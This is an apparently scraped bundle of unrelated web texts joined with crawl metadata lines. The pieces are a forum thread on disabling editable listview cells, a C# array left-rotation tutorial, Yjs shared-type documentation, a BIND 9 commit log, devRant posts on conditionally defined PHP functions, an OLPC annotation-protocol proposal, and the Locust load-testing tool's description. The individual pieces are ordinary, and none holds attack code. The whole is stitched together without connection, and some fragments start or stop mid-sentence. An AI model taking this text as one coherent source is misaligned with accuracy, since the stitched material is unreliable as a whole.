request. Cheers, Scott Hi Scott, Is there a way to disable these editable fields I have tested below options, but they are not working Disable=true; IsReadOnly = false; CanEdit= false; Regards Dulan Hi Dulan, if you want to specifically disable one of the entries, you’ll need to convert the code that I posted a link to in the previous comment in to JScript. This will is not a very nice way to do it. Or, you can intercept the Requesting event to cancel any changes. Cheers, Scott Shall we stop focus on particular cell using OnGotFocus event. We can check condition and stop focus on it.
https://potatoit.kiwi/2011/05/28/focus-on-an-editcell-in-a-listview/
CC-MAIN-2017-39
refinedweb
1,447
63.59
Back to: C#.NET Programs and Algorithms Left Rotation of Array by 1 in C# with Examples In this article, I am going to discuss the Left Rotation of Array by 1 in C# with Examples. Rotation of an array basically means shifting each and every element to a specified position to the left or right. While writing the program for array rotation we should consider 2 factors: - The direction of Rotation – In what direction do we want to perform the rotation. Whether it would be left to right (clockwise) or right to left (anticlockwise). - Position of Rotation – At which position rotation will start. In this article, we are going to discuss - Left Rotation of array by 1. - Right Rotation of array by 1. - Rotation of array by position k - Popup and Unshifting - Reversal Algorithm - Juggling Algorithm Left Rotation of array by 1 in C# In this rotation of the array, each element will be shifted to the left side by position 1. This basically means the value of index 1 will be shifted to index 0, index 2 value will be shifted to index 1, and so on. Example: From the above fig. We have an array with 5 elements. Arr[0] = 1, Arr[1] = 3, Arr[2] = 5, Arr[3] = 7, Arr[4] = 9 So, after performing the left rotation of array 1 the updated values of the array will be Aar[0] = 3, Arr[1] = 5, Arr[2] = 7, Arr[3] = 9, Arr[4] = 1 As from the above explanation, it is very clear to us that the changes will be as follows: Arr[0] = 1 => Aar[0] = 3 Arr[1] = 3 => Arr[1] = 5 Arr[2] = 5 => Arr[2] = 7 Arr[3] = 7 => Arr[3] = 9 Arr[4] = 9 => Arr[4] = 1 Here, we are basically doing what is that except for the index 0 we just need to select the value of indexes one by one and shift that value to the previous index. Algorithm to write code Step1: Create a Temp variable to store the value at index 0. Step2: Sift all the elements of array to left side by position 1 i.e. arr[i] = arr[i+1]; Step3: Store the value of temp at the last index of array i.e. arr[(arr.Length – 1)] = x; C# Program to perform left rotation of array by position 1. using System; public class LeftRotationOfArray { static void Main(string[] args) { int[] arr = new int[] { 1, 2, 3, 4, 5 }; Console.Write("Original Array :"); for (int i = 0; i < arr.Length; i++) { Console.Write(arr[i] + " "); } Console.WriteLine(); //Object declaration of class to access LeftRotate method LeftRotationOfArray obj = new LeftRotationOfArray(); Console.Write("Left Rotation of Array by 1: "); obj.LeftRotate(arr); for (int i = 0; i < arr.Length; i++) { Console.Write(arr[i] + " "); } Console.ReadKey(); } void LeftRotate(int[] arr) { int x = arr[0]; for (int i = 0; i < (arr.Length - 1); i++) { arr[i] = arr[i + 1]; } arr[(arr.Length - 1)] = x; } } Output: In the next article, I am going to discuss the Right Rotation of Array by 1 in C# with Examples. Here, in this article, I try to explain the Left Rotation of Array by 1 in C# with Examples and I hope you enjoy this Left Rotation of Array by 1 in C# article.
https://dotnettutorials.net/lesson/left-rotation-of-array-by-1-in-csharp/
CC-MAIN-2022-27
refinedweb
551
61.87
By now, we have learned how to make an editor collaborative and how to sync document updates using different providers. But we haven't covered the most unique feature of Yjs yet: Shared Types. Shared types allow you to make every aspect of your application collaborative. For example, you could sync your react-state using shared types. You can sync diagrams, drawings, and even whole 3d worlds using shared types to automatically resolve conflicts. Shared types are similar to common data types like Array, Map, or Set. The only difference is that they automatically sync & persist their state (using the providers) and that you can observe them. We already learned about the Y.Text type that we "bound" to an editor instance to automatically sync a rich-text editor. Yjs supports many other shared types like Y.Array, Y.Map, and Y.Xml. A complete list, including documentation for each type, can be found in the shared types section. Shared type instances must be connected to a Yjs document so we can sync them. First, we define a shared type on a Yjs document. Then we can manipulate it and observe changes. import * as Y from 'yjs'const ydoc = new Y.Doc()// Define an instance of Y.Array named "my array"// Every peer that defines "my array" like this will sync content with this peer.const yarray = ydoc.getArray('my array')// We can register change-observers like thisyarray.observe(event => {// Log a delta every time the type changes// Learn more about the delta format here:('delta:', event.changes.delta)})// There are a few caveats that you need to understand when working with shared types// It is best to explain this in a few lines of code:// We can insert & delete contentyarray.insert(0, ['some content']) // => delta: [{ insert: ['some content'] }]// Note that the above method accepts an array of content to insert.// So the final document will look like this:yarray.toArray() // => ['some content']// We can insert anything that is JSON-encodable. Uint8Arrays also work.yarray.insert(0, [1, { bool: true }, new Uint8Array([1,2,3])]) // => delta: [{ insert: [1, { bool: true }, Uint8Array([1,2,3])] }]yarray.toArray() // => [1, { bool: true }, Uint8Array([1,2,3]), 'some content']// You can even insert Yjs types, allowing you to create nested structuresconst subArray = new Y.Array()yarray.insert(0, [subArray]) // => delta: [{ insert: [subArray] }]// Note that the above observer doesn't fire when you insert content into subArraysubArray.insert(0, ['nope']) // [observer not called]// You need to create an observer on subArray insteadsubArray.observe(event => { .. })// Alternatively you can observe deep changes on yarray (allowing you to observe child-events as well)yarray.observeDeep(events => { console.log('All deep events: ', events) })subArray.insert(0, ['this works']) // => All deep events: [..]// You can't insert the array at another place. A shared type can only exist in one place.yarray.insert(0, [subArray]) // Throws exception! The other data types work similarly to Y.Array. The complete documentation is available in the shared types section that covers each type and the event format in detail. There are some things that are not possible with shared types, but that are possible with normal data types. Most importantly, it is not possible to move a type that was inserted into a Yjs document to a different location. The other important caveat is that you shouldn't modify JSON that you inserted or retrieved from a shared type. Yjs doesn't clone the inserted objects to improve performance. So when you modify a JSON object, you will actually change the internal representation of Yjs without notifying other peers of that change. // 1. An inserted array must not be moved to a different locationyarray.insert(0, ymap.get("my other array") as Y.Array) // will throw an error// 2. It is discouraged to modify JSON that is inserted or retrieved from a Yjs type// This might lead to documents that don't synchronize anymore.const myObject = { val: 0 }ymap.set(0, myObject)ymap.get(0).val = 1 // Doesn't throw an error, but is highly discouragedmyobject.val = 2 // Also doesn't throw an error, but is also discouraged. All changes must happen in a transaction. When you mutate a shared type without creating a transaction (e.g. yarray.insert(..)), Yjs will automatically create a transaction before manipulating the shared object. You can create transactions explicitly like this: const ydoc = new Y.Doc()const ymap = ydoc.getMap('favorites')// set an initial value - to demonstrate the how changes in ymap are representedymap.set('food', 'pizza')// observers are called after each transactionymap.observe(event => {console.log('changes', event.changes.keys)})ydoc.transact(() => {ymap.set('food', 'pencake')ymap.set('number', 31)}) // => changes: Map({ number: { action: 'added' }, food: { action: 'updated', oldValue: undefined } }) Event handlers and observers are called after each transaction. If possible, you should bundle as many changes in a single transaction as possible. The advantage is that you reduce expensive observer calls and create fewer updates that are sent to other peers. Yjs fires events in the following order: ydoc.on('beforeTransaction', event => { .. }) - Called before any transaction, allowing you to store relevant information before changes happen. Now the transaction function is executed. ydoc.on('beforeObserverCalls', event => {}) ytype.observe(event => { .. }) - Observers are called. ytype.observeDeep(event => { .. }) - Deep observers are called. ydoc.on('afterTransaction', event => {}) - Called after each transaction. ydoc.on('update', update => { .. }) - This update message is propagated by the providers. Especially when manipulating many objects, it makes sense to reduce the creation of update messages. So use transactions whenever possible. We often want to manage multiple collaborative documents in a single Yjs document. You can manage multiple documents using shared types. In the following demo project, I implemented functionality to add & delete documents. The list of all documents is updated in real-time as well. You could extend the above demo project to .. .. be able to delete specific documents .. have a collaborative document-name. You could introduce a Y.Map that holds the document-name, the document-content, and the creation-date. .. extend the document list to a fully-fledged file system based on shared types. [..] Shared types are not just great for collaborative editing. They are a unique kind of data structure that can be used to sync any kind of state across servers, browsers, and soon also native applications. Yjs is well suited for creating collaborative applications and gives you all the tools you need to create complex applications that can compete with Google Workspace. But shared types might be useful in high-performance computing as well for sharing state across threads; or in gaming for syncing data to remote clients directly without a roundtrip to a server. Since Yjs & shared types don't depend on a central server, these data structures are the ideal building blocks for decentralized, privacy-focused applications as well. I hope that this section gave you some inspiration for using shared types. Now you can c
https://docs.yjs.dev/getting-started/working-with-shared-types
CC-MAIN-2021-39
refinedweb
1,145
59.5
- 08 Apr, 2021 7 commits Run GDB for crashed named servers See merge request !4848 When a core file was generated after named crashed during a system test on 9.16, it wasn't processed by GDB, and no backtrace report was created. This is now fixed. There are also a few white-space changes. [v9_16] Move fromhex.pl script to bin/tests/system/ See merge request !4877 The fromhex.pl script needs to be copied from the source directory to the build directory before any test is run, otherwise the out-of-tree fails to find it. Given that the script is used only in system test, move it to bin/tests/system/. (cherry picked from commit cd0a34df) [v9_16] Free resources when gss_accept_sec_context() fails See merge request !4874 (cherry picked from commit 7eb87270) Even if a call to gss_accept_sec_context() fails, it might still cause a GSS-API response token to be allocated and left for the caller to release. Make sure the token is released before an early return from dst_gssapi_acceptctx(). (cherry picked from commit d954e152) - 07 Apr, 2021 13 commits Fix triggering rules for the "tarball-create" job See merge request !4871 Commit fd8ce681 (a backport of commit 4d5d3b75) did not account for the fact that the "tarball-create" GitLab CI job is not created for manually triggered pipelines. This prevents manual pipeline creation from succeeding as it causes the "gcc:tarball" job to have unsatisfied dependencies. Make sure the "tarball-create" job is created for manually triggered pipelines to allow such pipelines to be started again. Merge branch '2600-general-error-managed-keys-zone-dns_journal_compact-failed-no-more-v9_16' into 'v9_16' Resolve "general: error: managed-keys-zone: dns_journal_compact failed: no more" (v9.16) See merge request !4870 (cherry picked from commit 0174098a) Update the system to include a recoverable managed.keys journal created with <size,serial0,serial1,0> transactions and test that it has been updated as part of the start up process. (cherry picked from commit bb6f0fae) Both managed keys and regular zone journals need to be updated immediately when a recoverable error is discovered. (cherry picked from commit 0fbdf189) Previously, dns_journal_begin_transaction() could reserve the wrong amount of space. We now check that the transaction is internally consistent when upgrading / downgrading a journal and we also handle the bad transaction headers. (cherry picked from commit 83310ffd) previously the code assumed that it was a new transaction. (cherry picked from commit 520509ac) Instead of journal_write(), use correct format call journal_write_xhdr() to write the dummy transaction header which looks at j->header_ver1 to determine which transaction header to write instead of always writing a zero filled journal_rawxhdr_t header. (cherry picked from commit 5a6112ec) - Diego dos Santos Fronza authored Merge branch '2582-threadsanitizer-data-race-lib-dns-zone-c-10272-7-in-zone_maintenance-v9_16' into 'v9_16' Resolve TSAN data race in zone_maintenance See merge request !4866 - Diego dos Santos Fronza authored Fix race between zone_maintenance and dns_zone_notifyreceive functions, zone_maintenance was attempting to read a zone flag calling DNS_ZONE_FLAG(zone, flag) while dns_zone_notifyreceive was updating a flag in the same zone calling DNS_ZONE_SETFLAG(zone, ...). The code reading the flag in zone_maintenance was not protected by the zone's lock, to avoid a race the zone's lock is now being acquired before an attempt to read the zone flag is made. Change default stale-answer-client-timeout to off (9.16) See merge request !4867 Using "stale-answer-client-timeout" turns out to have unforeseen negative consequences, and thus it is better to disable the feature by default for the time being. (cherry picked from commit e443279b) - 02 Apr, 2021 10 commits Serve-stale "staleonly" recursion race condition See merge request !4860 When we are recursing, RPZ processing is not allowed. But when we are performing a lookup due to "stale-answer-client-timeout", we are still recursing. This effectively means that RPZ processing is disabled on such a lookup. In this case, bail the "stale-answer-client-timeout" lookup and wait for recursion to complete, as we we can't perform the RPZ rewrite rules reliably. (cherry picked from commit 3d3a6415) The dboption DNS_DBFIND_STALEONLY caused confusion because it implies we are looking for stale data **only** and ignore any active RRsets in the cache. Rename it to DNS_DBFIND_STALETIMEOUT as it is more clear the option is related to a lookup due to "stale-answer-client-timeout". Rename other usages of "staleonly", instead use "lookup due to...". Also rename related function and variable names. (cherry picked from commit 839df941) When doing a staleonly lookup we don't want to fallback to recursion. After all, there are obviously problems with recursion, otherwise we wouldn't do a staleonly lookup. When resuming from recursion however, we should restore the RECURSIONOK flag, allowing future required lookups for this client to recurse. (cherry picked from commit 3f81d79f) When implementing "stale-answer-client-timeout", we decided that we should only return positive answers prematurely to clients. A negative response is not useful, and in that case it is better to wait for the recursion to complete. To do so, we check the result and if it is not ISC_R_SUCCESS, we decide that it is not good enough. However, there are more return codes that could lead to a positive answer (e.g. CNAME chains). This commit removes the exception and now uses the same logic that other stale lookups use to determine if we found a useful stale answer (stale_found == true). This means we can simplify two test cases in the serve-stale system test: nodata.example is no longer treated differently than data.example. (cherry picked from commit aaed7f9d) Pretty newsworthy. (cherry picked from commit e44bcc6f) The NS_QUERYATTR_ANSWERED attribute is to prevent sending a response twice. Without the attribute, this may happen if a staleonly lookup found a useful answer and sends a response to the client, and later recursion ends and also tries to send a response. The attribute was also used to mask adding a duplicate RRset. This is considered harmful. When we created a response to the client with a stale only lookup (regardless if we actually have send the response), we should clear the rdatasets that were added during that lookup. Mark such rdatasets with the a new attribute, DNS_RDATASETATTR_STALE_ADDED. Set a query attribute NS_QUERYATTR_STALEOK if we may have added rdatasets during a stale only lookup. Before creating a response on a normal lookup, check if we can expect rdatasets to have been added during a staleonly lookup. If so, clear the rdatasets from the message with the attribute DNS_RDATASETATTR_STALE_ADDED set. (cherry picked from commit 3d5429f6) With stale-answer-client-timeout, we may send a response to the client, but we may want to hold on to the network manager handle, because recursion is going on in the background, or we need to refresh a stale RRset. Simplify the setting of 'nodetach': * During a staleonly lookup we should not detach the nmhandle, so just set it prior to 'query_lookup()'. * During a staleonly "stalefirst" lookup set the 'nodetach' to true if we are going to refresh the RRset. Now there is no longer the need to clear the 'nodetach' if we go through the "dbfind_stale", "stale_refresh_window", or "stale_only" paths. (cherry picked from commit 48b0dc15) When doing a staleonly lookup, ignore active RRsets from cache. If we don't, we may add a duplicate RRset to the message, and hit an assertion failure in query.c because adding the duplicate RRset to the ANSWER section failed. This can happen on a race condition. When a client query is received, the recursion is started. When 'stale-answer-client-timeout' triggers around the same time the recursion completes, the following sequence of events may happen: 1. Queue the "try stale" fetch_callback() event to the client task. 2. Add the RRsets from the authoritative response to the cache. 3. Queue the "fetch complete" fetch_callback() event to the client task. 4. Execute the "try stale" fetch_callback(), which retrieves the just-inserted RRset from the database. 5. In "ns_query_done()" we are still recursing, but the "staleonly" query attribute has already been cleared. In other words, the query will resume when recursion ends (it already has ended but is still on the task queue). 6. Execute the "fetch complete" fetch_callback(). It finds the answer from recursion in the cache again and tries to add the duplicate to the answer section. This commit changes the logic for finding stale answers in the cache, such that on "stale_only" lookups actually only stale RRsets are considered. It refactors the code so that code paths for "dbfind_stale", "stale_refresh_window", and "stale_only" are more clear. First we call some generic code that applies in all three cases, formatting the domain name for logging purposes, increment the trystale stats, and check if we actually found stale data that we can use. The "dbfind_stale" lookup will return SERVFAIL if we didn't found a usable answer, otherwise we will continue with the lookup (query_gotanswer()). This is no different as before the introduction of "stale-answer-client-timeout" and "stale-refresh-time". The "stale_refresh_window" lookup is similar to the "dbfind_stale" lookup: return SERVFAIL if we didn't found a usable answer, otherwise continue with the lookup (query_gotanswer()). Finally the "stale_only" lookup. If the "stale_only" lookup was triggered because of an actual client timeout (stale-answer-client-timeout > 0), and if database lookup returned a stale usable RRset, trigger a response to the client. Otherwise return and wait until the recursion completes (or the resolver query times out). If the "stale_only" lookup is a "stale-anwer-client-timeout 0" lookup, preferring stale data over a lookup. In this case if there was no stale data, or the data was not a positive answer, retry the lookup with the stale options cleared, a.k.a. a normal lookup. Otherwise, continue with the lookup (query_gotanswer()) and refresh the stale RRset. This will trigger a response to the client, but will not detach the handle because a fetch will be created to refresh the RRset. (cherry picked from commit 92f7a678) The stale-answer-client-timeout feature introduced a dependancy on when a client may be detached from the handle. The dboption DNS_DBFIND_STALEONLY was reused to track this attribute. This overloads the meaning of this database option, and actually introduced a bug because the option was checked in other places. In particular, in 'ns_query_done()' there is a check for 'RECURSING(qctx->client) && (!QUERY_STALEONLY(&qctx->client->query) || ...' and the condition is satisfied because recursion has not completed yet and DNS_DBFIND_STALEONLY is already cleared by that time (in query_lookup()), because we found a useful answer and we should detach the client from the handle after sending the response. Add a new boolean to the client structure to keep track of client detach from handle is allowed or not. It is only disallowed if we are in a staleonly lookup and we didn't found a useful answer. (cherry picked from commit fee16424) - 01 Apr, 2021 7 commits Remove custom ISC SPNEGO implementation (v9.16) See merge request !4855 Previously, every function had it's own #ifdef GSSAPI #else #endif block that defined shim function in case GSSAPI was not being used. Now the dummy shim functions have be split out into a single #else #endif block at the end of the file. This makes the gssapictx.c similar to 9.17.x code, making the backports and reviews easier. The Heimdal Kerberos library handles the OID sets in a different manner. Unify the handling of the OID sets between MIT and Heimdal implementations by dynamically creating the OID sets instead of using static predefined set. This is how upstream recommends to handle the OID sets. The GSSAPI now needs both gssapi and krb5 libraries, so we need to request both CFLAGS and LIBS from the configure script. The custom ISC SPNEGO mechanism implementation is no longer needed on the basis that all major Kerberos 5/GSSAPI (mit-krb5, heimdal and Windows) implementations support SPNEGO mechanism since 2006. This commit removes the custom ISC SPNEGO implementation, and removes the option from both autoconf and win32 Configure script. Unknown options are being ignored, so this doesn't require any special handling. When the authsock.pl script would be terminated with a signal, it would leave the pidfile around. This commit adds a signal handler that cleanups the pidfile on signals that are expected. - 31 Mar, 2021 2 commits [v9_16] Run gcc:tarball CI job in web-triggered pipelines See merge request !4852 The gcc:tarball CI job may identify problems with tarballs created by "make dist" of the tarball-create CI job. Enabling the gcc:tarball CI job in web-triggered pipelines provides developers with a test vector. (cherry picked from commit 4d5d3b75) - 26 Mar, 2021 1 commit -
https://gitlab.isc.org/isc-projects/bind9/-/commits/v9_16
CC-MAIN-2021-17
refinedweb
2,122
63.19
Learn how easy it is to sync an existing GitHub or Google Code repo to a SourceForge project! See Demo You can subscribe to this list here. Showing 2 results of 2 Here's a tiny patch against sbcl-0.9.5/tools-for-build/where-is-mcontext.c to quiet gcc from complaining about an implicitly defined exit function. It simply adds #include <stdlib.h> -- Rex Thiemo Seufer wrote: > Hello All, > > currently foreign.test.sh fails on mips in the late resolution test: > > Invalid exit status: foreign.test.sh > test failed, expected 104 return code, got 1 > > doc/internals/foreign-linkage.texinfo claims late resolution is > only supported for ports with linkage-table support. The appended > patch excludes those tests for non-linkage-table ports. Committed, since I learned a bit more about linkage table support in the meanwhile and am now resonably sure this patch is correct. Thiemo
http://sourceforge.net/p/sbcl/mailman/sbcl-devel/?viewmonth=200509&viewday=29
CC-MAIN-2015-22
refinedweb
150
59.8
I'm in a "Systems Programming" class that uses C exclusively. Not having the background in C that is expected (due to transfering colleges) makes things a little bit harder for me. This assignment has us first implementing a sort on an integer array using pointers, which wasn't too bad. However, we then have to use a linked list struct and do the same sorting. My code *almost* works, but the first number of the output is never sorted - it's always just the first number, and it's never "supposed" to be in the same position. Any help would be greatly appreciated, as it was tough for me to get this far, and I've been banging my head against the wall far too long trying to solve this last remaining issue. Here's my code: #include <stdio.h> #include <stdlib.h> #define ARRAY_SIZE 10 typedef struct llist { //linked list struct int data; struct llist *next; } node; void part3Sort(node *head) { //Bubble sort for int array. int i,j; node *a, *b, *c, *curr; for(i=1; i <=ARRAY_SIZE; i++) { a = head; b = head->next; c = b->next; for(j=1; j <(ARRAY_SIZE-(i)); j++) { if(b->data > c->data) { b->next = c->next; c->next = b; a->next = c; a = c; c = b->next; } else { a = b; b = c; c = c->next; } } } printf("Sorted array:\n"); //Print out the sorted array. curr = a; while(curr) { printf("%d\n", curr->data); curr = curr->next; } } void part1() { //Create *int/malloc array/assignment/free(). node* head, *curr; //Define an int* pointer variable. int i; head = NULL; unsigned int iseed = (unsigned int)time(NULL); //Use random #'s. srand (iseed); printf("Initial array:\n"); for (i=1; i<=ARRAY_SIZE; i++) { // Assign values to array and print them. curr = (node*) malloc(sizeof(node)); curr->data = rand() % 100 + 1; curr->next = head; head = curr; } curr = head; while(curr!=NULL) { printf("%d\n", curr->data); curr = curr->next; } part3Sort(head); } main(int argc,char **argv) { part1(); } Sample (wrong) output below: Initial array: 35 86 76 66 12 36 14 92 55 81 Sorted array: [b]35[/b] 12 14 36 55 66 76 81 86 92 This being my first ever stab at C, I'm sure I'm doing some strange things here... Also, any reference to arrays is there because we first created a program to sort arrays then had to modify it. Thanks again for any insight.
http://www.dreamincode.net/forums/topic/237498-linked-list-bubble-sort-misses-1-value/page__pid__1549724__st__0&#entry1549724
crawl-003
refinedweb
405
68.91
I'm learning python from Google code class. I'm trying out the exercises. def front_x(words): x_list, ord_list = [] for word in words: if word[0] == 'x': x_list.append(word) else: ord_list.append(word) return sorted(x_list) + sorted(ord_list) You are trying to use tuple assignment: x_list, ord_list = [] you probably meant to use multiple assignment: x_list = ord_list = [] which will not do what you expect it to; use the following instead: x_list, ord_list = [], [] or, best still: x_list = [] ord_list = [] When using a comma-separated list of variable names, Python expects there to be a sequence of expressions on the right-hand side that matches the number variables; the following would be legal too: two_lists = ([], []) x_list, ord_list = two_lists This is called tuple unpacking. If, on the other hand, you tried to use multiple assignment with one empty list literal ( x_list = ord_list = []) then both x_list and ord_list would be pointing to the same list and any changes made through one variable will be visible on the other variable: >>> x_list = ord_list = [] >>> x_list.append(1) >>> x_list [1] >>> ord_list [1] Better keep things crystal clear and use two separate assignments, giving each variable their own empty list.
https://codedump.io/share/lOz0zmPJMg7N/1/valueerror-need-more-than-0-values-to-unpack-python-lists
CC-MAIN-2016-50
refinedweb
190
54.46
Ranter Join devRant Pipeless API From the creators of devRant, Pipeless lets you power real-time personalized recommendations and activity feeds using a simple APILearn More - DubbaThony1528225dIt's definitely not how you want to use php, but if you need some temp code to be hacked together winthin seconds, php allows these weird things that allow utterly rapid coding.. But if you arent going to delete this within minutes (come on, everyone of us wrote some code to be one-time-use to replace us doing manual task, no?) it screams for refactor. But yes, you can do that. There is also runkit that allows you to unset function among other things. Even unset built in function to replace it with own implementation for even more "O.O"-ness... (Requires extension) Php is weird language that gives you all the tools, to write properly and improperly and basically leaves you with 'you do you' - - C0D465535225dYes. And you as the dev will be slapped with my keyboard so hard you'll be eating alphabet soup for a month. Just because you can, doesn't mean you should 😏 - fuckyouall3244225dYou can do this with almost any scripting language. I don't see how this is strange. I also don't see how you would do this with C without using function pointers, which are a bit more explicit. Lua: if _G.some_function == nil then function some_function() end end Javascript: if (typeof some_function === 'undefined') function some_function() {} Python (pseudo code, can't remember off the top of my head) if locals().get('some_function', None) is None: def some_function(): pass ad nauseum... - Midnight-shcode3152225d@junon well... yes, that's what I mentioned on the end there, except i said JavaScript instead of "almost any scripting language". the thing is, lately, I'm kind of... more and more wishing for a JS-like language, in syntax (partially), and in how the dev console in the browser is basically a living environment, except with a sane logic to it... while at the same time the only languages I know that are kind of close to it are precisely the moronic ones like JS and Python, which is probably what causes the confusion of "this is cool, but weird, but cool, but stupid, but cool..." - Root76419225dIn Ruby, you can open an instance of a class and redefine methods on only that instance. Sound crazy? It’s incredibly useful for specs since you can open an instance and curry or replace a method to count its runtime invocations, check call arguments, override its return value, etc. - fuckyouall3244225d@Root Javascript too, it's just becoming a lost art with all of the new Class syntax. I really should learn Ruby, though. It's the only mainstream language I still haven't really looked at at all... - Root76419225d@junon I will always agree with that. It’s always good to pick up another language. Especially when it’s Ruby or Gaelic. 😉 - fuckyouall3244224d - Root76419224d@junon An bhfuil Gaeilge agat? - fuckyouall3244224d@Root oh shit, uh... gaelic doesn't have no, so... "Cha agat"? Is that close? It was cursory xD I have no command of any of it whatsoever. Do you speak it? - Root76419224d@junon No is ní (or níl) 😂 But no, not yet. I’m doing my best to learn. - SortOfTested24488224dYour kingdom for default interface implementation 😋 - IntrusionCM6883224dIf you find this fascinating, dig deep into reflection. And FFI. Shit you can do will make you regret the choice too look at it. Forbidden fruit ;) - Hazarth3416224dwhen you think about it, this isn't all that far off from doing a command pattern... just instead of creating a new object implementing a common interface you just directly return the function so... interface SomeAction class Action1: SomeAction{ void run(){...code1...} } class Action2:SomeAction{ void run(){...code2...} } SomeAction action = null; if (var == something) action = new Action1(); else action = new Action2(); this is roughly what it's doing and this is.. while rare, still a valid design pattern (though I doubt that php used it correctly, I'd need to see more of the code? and if it is then it's stateful and ...ew..) so it's arguably shorter to write it by passing functions around (you can do it in C too) but yeah, I always found objects to be more... readable? ... really depends on the code though! so to me this isn't a huge mindfuck I think, it's just mildly annoying that someone would do it like that :D - Midnight-shcode3152223d@Hazarth yeah, that's probably my only real problem with it: it's implemented in such a way that it's absolutely not visible it's happening. at least with objects i am aware there might be some overloading going on and where to look for it. with functions explicitly assigned to a variable it's obvious that this can happen, possibly even that it does happen which is why the function was assigned into a variable. with this conditional definition of standalone function nothing hints that this could be the case and the only way to find it is to do a project-wide search for "function functionName". which you wouldn't know to do unless you already know it's been done to the function, which you wouldn't know unless you do the search (or start seeing aggravating UFO bugs) - Midnight-shcode3152223don an unrelated note, can anyone explain what the difference between UFO bug and a heisenbug is? - fuckyouall3244222d@Midnight-shcode Keeping in mind these are not terms people really use often (more for fun, less for actual work): - Heisenbug means the bug changes its behavior when you try to debug it. - UFO bug is a bug that customers/users insist exist, even though they can't reproduce it on command, and might still insist it exists even after you've proven it does not/cannot exist. Related Rants did you know, that in PHP, you can do: if ( ! function_exists('function_name')) { function function_name() { //code of the function } } which apparently means you can do if($var == 'something'){ function functionName(){ //some code } } else if($var == 'something else'){ function functionName(){ //some completely different code } } so now, apparently: 1. before this code executes, the function doesn't exist at all (okay, i can live with that) 2. after this code executes, any call to that function can result in any of those two completely different bodies of the same-name function executing, depending on what the $var was set at that time? ...so... now not only the same call to the same(name) function can do two completely different things, *but if you change the value of $var afterwards, you can't even properly find out which version of that function is in effect for the remainder of the run of the script*...????? WHAT. THE. ...i mean... I can't help but think that the idea of conditional function declaration like this is... kind of cool (have I been warped by JavaScript too much?), but at the same time... WHAT THE FUCK. rant php
https://devrant.com/rants/3725495/did-you-know-that-in-php-you-can-do-if-function-exists-function-name-function-fu
CC-MAIN-2021-31
refinedweb
1,170
70.02
Comment Anywhere Annotation Protocol Proposal From OLPC Introduction The basic building block of this annotation proposal is the queryable Atom feed. Each user has their own feed, through which they publish annotations. This proposal includes definitions of: - Extensions to Atom to support publishing of annotations - A protocol for query publishing feeds - Protocols for integrating with web pages Atom Extensions Atom is a protocol for notifying of content that has been published. The canonical use case for Atom is weblogs - each time a new entry is published in a weblog, a new entry is added to an Atom feed. Clients can then query the feed to find these newly published entries. Atom is defined in RFC 4287. Comment Anywhere uses existing standards where possible. Feeds URIs While the concept of a feed URI is not explicit in the Atom standard, applications that retrieve feeds via HTTP must be aware of each feed's URI. Feed URIs are a useful means of identifying feeds, and are important for informal social networking: people recommend feed URIs to one another and they can trust that content on a feed URI comes from the owner of that URI. Comment Anywhere defines a feed URI as a URI where a Comment Anywhere feed is published. A feed URI must not have a query or fragment part. The following are examples of valid feed URIs: As described below, a feed URI can be queried. Entry ID As specified in [ section 4.1.2] According to section 4.1.2 of RFC 4287, each Atom entry has an ID. In standard Atom, this ID is a URI, but it is has no meaning other than to uniquely identify an entry. In Comment Anywhere, this ID not only identifies the entry, it also identifies the canonical location of the entry, which is the location where it was first published. A valid entry can always be retrieved from the canonical location specified by its ID. The ID is based on the URI of the publishing feed that first published the entry, and is of the following form: feed-uri?entry=some-string The following are both valid entry IDs: This format was chosen because it is simple to identify the original feed URI from a given entry URI. Additional link rel types An Atom link tag has a "rel" attribute that specifies the kind of relationship the link represents. Section 4.2.7.2 of RFC 4287 allows for arbitrary URI's to be used as values for the rel attribute. Comment Anywhere defines one additional link rel value. - base-uri/target - this link specifies the target or subject of the annotation. The value of base-uri is arbitrary, and we propose. Additional tags Comment Anywhere defines one new tag for atom entries: - ca:available - an Atom timestamp that identifies when this entry became available for query on the current feed. This may differ from published date when an entry orginally published on one feed is served on another feed. We propose to identify the XML namespace for Comment Anywhere tags, with "ca" being the customary prefix. Restrictions on Atom Feeds Not so many of these yet: - The tags "published", "title" and "content" are mandatory in Comment Anywhere entries. Querying Publishing Feeds Publishing feeds support a simple query protocol. It allows users and aggregators to retrieve entries in which they are interested without needing to retrieve every published entry. Integrating with Web Pages - Trackbacks What's Missing Some areas that we haven't yet given a lot of thought to are: - identifying fragments of a page to which annotations apply. - how individuals publish annotations to their publishing feed. - the notion of work groups with a particular identity. - privacy - currently all annotations are public. Background Comment Anywhere grew out discussions between Alec Thomas and Alan Green about open and distributed social networks. We were pleasantly surprised by the amount of overlap between this proposal and the Original Annotation API Proposal.
http://wiki.laptop.org/index.php?title=Comment_Anywhere_Annotation_Protocol_Proposal&oldid=59169
CC-MAIN-2015-35
refinedweb
659
62.38
Developer friendly load testing framework Project description Locust Locust is an easy to use, scriptable and scalable performance testing tool. You define the behaviour of your users in regular Python code, instead of being constrained by a UI or domain specific language that only pretends to be real code. This makes Locust infinitely expandable and very developer friendly. To get started right away, head over to the documentation. Features Write user test scenarios in plain old Python If you want your users to loop, perform some conditional behaviour or do some calculations, you just use the regular programming constructs provided by Python. Locust runs every user inside its own greenlet (a lightweight process/coroutine). This enables you to write your tests like normal (blocking) Python code instead of having to use callbacks or some other mechanism. Because your scenarios are “just python” you can use your regular IDE, and version control your tests as regular code (as opposed to some other tools that use XML or binary formats) from locust import HttpUser, task, between class QuickstartUser(HttpUser): wait_time = between(1, 2) def on_start(self): self.client.post("/login", json={"username":"foo", "password":"bar"}) @task def hello_world(self): self.client.get("/hello") self.client.get("/world") @task(3) def view_item(self): for item_id in range(10): self.client.get(f"/item?id={item_id}", name="/item") Distributed & Scalable - supports hundreds of thousands of users Locust makes it easy to run load tests distributed over multiple machines. It is event-based (using gevent), which makes it possible for a single process to handle many thousands concurrent users. While there may be other tools that are capable of doing more requests per second on a given hardware, the low overhead of each Locust user makes it very suitable for testing highly concurrent workloads. Web-based UI Locust has a user friendly web interface that shows the progress of your test in real-time. You can even change the load while the test is running. It can also be run without the UI, making it easy to use for CI/CD testing. Can test any system Even though Locust primarily works with web sites/services, it can be used to test almost any system or protocol. Just write a client for what you want to test, or explore some created by the community. Hackable Locust's code base is intentionally kept small and doesn't solve everything out of the box. Instead, we try to make it easy to adapt to any situation you may come across, using regular Python code. If you want to send reporting data to that database & graphing system you like, wrap calls to a REST API to handle the particulars of your system or run a totally custom load pattern, there is nothing stopping you! Links - Website: locust.io - Documentation: docs.locust.io - Support/Questions: StackOverflow - Code/issues: GitHub - 